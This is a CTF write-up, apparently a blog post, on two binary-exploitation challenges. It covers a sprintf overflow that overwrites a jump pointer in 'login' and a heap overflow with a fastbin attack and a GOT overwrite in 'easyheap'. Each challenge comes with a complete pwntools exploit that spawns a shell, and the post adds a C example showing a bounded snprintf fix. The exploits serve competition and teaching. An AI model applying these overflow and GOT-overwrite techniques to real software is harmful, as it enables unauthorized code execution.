CTF - 2019 Zhejiang Provincial College Students' Cybersecurity Competition

Pwn

0x1 login

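This challenge is written in C++ and has many functions with very long names, but that is not a big problem. After analysis in IDA, entering the following data is enough to make the program jump to a certain address: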

 _____   _  ____ _____ _____   _                _       
|__ / | |/ ___|_ _| ___| | | ___ __ _(_)_ __
/ /_ | | | | | | |_ | | / _ \ / _` | | '_ \
/ /| |_| | |___ | | | _| | |__| (_) | (_| | | | | |
/____\___/ \____| |_| |_| |_____\___/ \__, |_|_| |_|
|___/
Please enter username: admin
Please enter password: 2jctf_pa5sw0rd
Password accepted: Password accepted:

Segmentation fault (core dumped)

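Next, it turns out that the destination of the sprintf is not large enough, so the write can reach this jump pointer. The program itself also contains a system("/bin/sh") backdoor, so overwriting the jump pointer with the backdoor pointer directly yields a shell.

The exploit is as follows: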

#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
from pwn import *

context.log_level = "debug"
context.arch = "amd64"
elf = ELF("login")
sh = 0
lib = 0

def pwn(ip,port,debug):
    global sh
    global lib
    # debug == 1 runs the local binary, otherwise connect to the remote service
    if(debug == 1):
        sh = process("./login")
        lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    else:
        sh = remote(ip,port)
        lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    # Username prompt
    payload = "admin\x00"
    sh.sendlineafter(":",payload)
    sh.recvuntil(":")
    # Valid password, then padding and the backdoor address that replaces the jump pointer
    payload = "2jctf_pa5sw0rd\x00"
    payload += "aaaabaaac\x00aadaaaeaaafaaagaaahayyyyyyyyyyyyyyyyyyyyyyyyyyy" + p64(0x400E9E)
    sh.sendline(payload)
    sh.interactive()

if __name__ == "__main__":
    pwn("127.0.0.1",9999,1)
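
The root cause in login, as the fix would look in source. This is an added example, not code from the challenge binary: the struct layout, the function names and the "Password accepted: %s" format string are assumptions made to model a fixed buffer followed by a jump pointer.

```c
#include <stdio.h>
#include <string.h>

/* Assumed layout for illustration: a fixed buffer directly followed by a
   function pointer, the arrangement the write-up describes for login. */
struct session {
    char msg[32];
    void (*on_success)(void);
};

static void greet(void) { puts("welcome"); }

/* Vulnerable pattern (shown for comparison, never called here): sprintf does
   not know how big msg is, so a long password runs past it into on_success. */
int format_unsafe(struct session *s, const char *password) {
    sprintf(s->msg, "Password accepted: %s", password);
    return 0;
}

/* Hardened form: snprintf is bounded by sizeof msg, and its return value
   (the length it wanted to write) shows when the input did not fit. */
int format_safe(struct session *s, const char *password) {
    int need = snprintf(s->msg, sizeof s->msg, "Password accepted: %s", password);
    if (need < 0 || (size_t)need >= sizeof s->msg) {
        s->msg[0] = '\0';   /* reject instead of using a truncated string */
        return -1;
    }
    return 0;
}

/* Returns 1 if an oversized password is rejected and the pointer survives. */
int oversized_input_is_contained(void) {
    struct session s = { "", greet };
    char big[128];          /* constructed sample input: 127 'A' bytes */
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    int rc = format_safe(&s, big);
    return rc == -1 && s.on_success == greet && s.msg[0] == '\0';
}

int main(void) {
    struct session s = { "", greet };
    if (format_safe(&s, "hunter2") == 0) { puts(s.msg); s.on_success(); }
    printf("oversized contained: %d\n", oversized_input_is_contained());
    return 0;
}
```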

0x2 easyheap

For a heap challenge, check the protections first:

pig@ubuntu:$ checksec easyheap 
[*] '/home/pig/Pig/CTF/ShengSai/19.9.21/pwn/easyheap/easyheap'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)

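PIE is not enabled and the GOT is not protected, so the first idea is to overwrite free_GOT.

Loading the binary into IDA then reveals an obvious heap overflow, and the program itself already contains the system function. So free_GOT can be overwritten directly with system_PLT, after which freeing a chunk whose content is /bin/sh executes system("/bin/sh\x00").

The specific steps are as follows:

Allocate three chunks, and overflow from the second chunk into the third to carry out a fastbin attack against chunk_list. Then overwrite the first chunk's entry with free_GOT, and use the edit function to change free_GOT to system_PLT. The second chunk's content is /bin/sh\x00 at the same time, so freeing the second chunk yields a shell.

The exploit is as follows: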

#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
from pwn import *

context.log_level = "debug"
context.arch = "amd64"
elf = ELF("easyheap")
sh = 0
lib = 0

# Menu option 2: edit chunk idx, writing size bytes of content
def edit(idx,size,content):
    sh.sendlineafter("Your choice :","2")
    sh.sendlineafter(":",str(idx))
    sh.sendlineafter(":",str(size))
    sh.sendafter(":",content)

# Menu option 1: allocate a chunk of the given size
def add(size,content):
    sh.sendlineafter("Your choice :","1")
    sh.sendlineafter(":",str(size))
    sh.sendlineafter(":",content)

# Menu option 3: free chunk idx
def free(idx):
    sh.sendlineafter("Your choice :","3")
    sh.sendlineafter(":",str(idx))

def pwn(ip,port,debug):
    global sh
    global lib
    if(debug == 1):
        sh = process("./easyheap")
        lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    else:
        sh = remote(ip,port)
        lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    # Three chunks; the third is freed into the fastbin
    add(0x68,'')
    add(0x68,'')
    add(0x68,'')
    free(2)
    # Overflow from the second chunk into the freed third chunk (fastbin attack on chunk_list)
    payload = '/bin/sh\x00'
    payload = payload.ljust(0x68,'a')
    payload += p64(0x71) + p64(0x6020ad)
    edit(1,0x200,payload)
    add(0x68,'')
    add(0x68,'')
    # Point the first chunk's entry at free_GOT
    payload = '\xaa' * 3 + p64(0) * 4 + p64(elf.got['free'])
    edit(3,len(payload) + 0x100,payload)
    # free_GOT -> system_PLT, then free the chunk holding /bin/sh
    edit(0,9,p64(elf.plt['system']))
    free(1)
    sh.interactive()

if __name__ == "__main__":
    pwn("127.0.0.1",9999,1)

Author: 咲夜南梦
Article link: http://yoursite.com/2019/09/23/CTF-19%E5%B9%B4%E6%B5%99%E6%B1%9F%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%A4%A7%E8%B5%9B/
Copyright notice: Unless otherwise stated, all articles on this blog are licensed under CC BY-NC-SA 4.0. Please credit 咲夜南梦's blog when reposting.